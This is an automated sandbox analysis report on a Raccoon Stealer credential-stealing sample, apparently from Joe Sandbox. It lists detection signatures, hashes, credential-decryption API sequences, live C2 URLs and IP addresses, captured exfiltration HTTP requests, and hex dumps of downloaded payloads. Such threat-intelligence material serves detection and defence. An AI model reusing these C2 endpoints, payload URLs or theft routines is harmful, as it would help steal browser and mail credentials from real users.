Windows Analysis Report Tk6dsSEyOC.exe

Overview

General Information

Sample Name: Tk6dsSEyOC.exe
Analysis ID: 528742
MD5: 3613e68843dd0c745f079a6ef51a6e6a
SHA1: 87f91a8e3bf01475cf3fe5a690374f95a4fb66c2
SHA256: 271453e30f708718f175654f2b3fb5f4438effb11a928656d58f0051b424c740
Tags: exeRaccoonStealer
Infos:

Most interesting Screenshot:

Detection

Raccoon
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Machine Learning detection for sample
Self deletion via cmd delete
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sigma detected: Suspicious Del in CommandLine
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
PE file contains more sections than normal
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: Tk6dsSEyOC.exe Virustotal: Detection: 49% Perma Link
Source: Tk6dsSEyOC.exe ReversingLabs: Detection: 54%
Yara detected Raccoon Stealer
Source: Yara match File source: 0.3.Tk6dsSEyOC.exe.2340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Tk6dsSEyOC.exe.2340000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.480197054.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.251005006.0000000002340000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Tk6dsSEyOC.exe PID: 7164, type: MEMORYSTR
Antivirus detection for URL or domain
Source: http://188.127.251.217/sys64.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://188.127.251.217/sys64.exe Virustotal: Detection: 12% Perma Link
Machine Learning detection for sample
Source: Tk6dsSEyOC.exe Joe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0040E727 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData, 0_2_0040E727
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0040D560 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData, 0_2_0040D560
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0042770E CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree, 0_2_0042770E
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0040F78B __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree, 0_2_0040F78B
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004278E1 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree, 0_2_004278E1
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0040DC7B __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree, 0_2_0040DC7B
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0041E52C __EH_prolog,_strlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,PK11_FreeSlot, 0_2_0041E52C

Compliance:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Unpacked PE file: 0.2.Tk6dsSEyOC.exe.400000.0.unpack
Uses 32bit PE files
Source: Tk6dsSEyOC.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp, freebl3.dll.0.dr
Source: Binary string: C:\bixorotuma_wufeyeyur\loyopuwudi-xovozoko\muba.pdb source: Tk6dsSEyOC.exe
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.427951428.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000002.481321705.000000004BC7E000.00000004.00000010.sdmp, api-ms-win-core-memory-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmp, ldap60.dll.0.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source: Binary string: C:\bixorotuma_wufeyeyur\loyopuwudi-xovozoko\muba.pdb0= source: Tk6dsSEyOC.exe
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: Tk6dsSEyOC.exe, 00000000.00000002.483423544.000000006FD89000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp, freebl3.dll.0.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr, MapiProxy_InUse.dll.0.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmp, ldap60.dll.0.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: Tk6dsSEyOC.exe, 00000000.00000002.483423544.000000006FD89000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr, mozMapi32_InUse.dll.0.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.372483857.000000004BC51000.00000004.00000010.sdmp, AccessibleMarshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.373618716.000000004BC7F000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373284353.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373416548.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373403037.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373313194.000000004BC7E000.00000004.00000010.sdmp, breakpadinjector.dll.0.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0043DA90 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 0_2_0043DA90
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0045E752 FindFirstFileExW, 0_2_0045E752
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00434721 __EH_prolog,GetLogicalDriveStringsA, 0_2_00434721
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49767 -> 91.219.236.69:80
Source: Traffic Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49767 -> 91.219.236.69:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://91.219.236.162/masterdanteloma
Source: Malware configuration extractor URLs: http://185.163.47.176/masterdanteloma
Source: Malware configuration extractor URLs: http://193.38.54.238/masterdanteloma
Source: Malware configuration extractor URLs: http://74.119.192.122/masterdanteloma
Source: Malware configuration extractor URLs: http://91.219.236.240/masterdanteloma
Source: Malware configuration extractor URLs: https://t.me/masterdanteloma
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SERVERASTRA-ASHU SERVERASTRA-ASHU
Source: Joe Sandbox View ASN Name: SERVERASTRA-ASHU SERVERASTRA-ASHU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /masterdanteloma HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 91.219.236.69
Source: global traffic HTTP traffic detected: GET //l/f/i6j2Un0B3dP17SpzFNyq/762b827e1bbc7bd715bf97e0fb01fbddd5bf5ab2 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.69
Source: global traffic HTTP traffic detected: GET //l/f/i6j2Un0B3dP17SpzFNyq/c88f6d712fdcff784a2f2a2ae8ea36494792f04b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.69
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 1400Host: 91.219.236.69
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 91.219.236.240 91.219.236.240
Source: Joe Sandbox View IP Address: 91.219.236.162 91.219.236.162
Source: Joe Sandbox View IP Address: 91.219.236.162 91.219.236.162
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 25 Nov 2021 17:24:09 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Sun, 14 Nov 2021 14:06:13 GMTETag: "619117d5-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 25 Nov 2021 17:24:13 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Sun, 14 Nov 2021 14:06:12 GMTETag: "619117d4-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 